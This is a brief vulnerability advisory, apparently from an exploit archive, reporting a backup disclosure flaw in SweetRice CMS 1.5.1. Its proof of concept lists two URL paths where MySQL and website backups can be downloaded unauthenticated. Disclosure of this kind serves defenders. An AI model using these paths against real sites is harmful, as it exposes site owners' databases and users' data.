1ee96838d2
2 new exploits SweetRice 1.5.1 - Arbitrary File Upload SweetRice 1.5.1 - Backup Disclosure
19 lines
546 B
Text
Executable file
19 lines
546 B
Text
Executable file
Title: SweetRice 1.5.1 - Backup Disclosure
|
|
Application: SweetRice
|
|
Versions Affected: 1.5.1
|
|
Vendor URL: http://www.basic-cms.org/
|
|
Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
|
|
Discovered by: Ashiyane Digital Security Team
|
|
Tested on: Windows 10
|
|
Bugs: Backup Disclosure
|
|
Date: 16-Sept-2016
|
|
|
|
|
|
Proof of Concept :
|
|
|
|
You can access to all mysql backup and download them from this directory.
|
|
http://localhost/inc/mysql_backup
|
|
|
|
and can access to website files backup from:
|
|
http://localhost/SweetRice-transfer.zip
|
|
|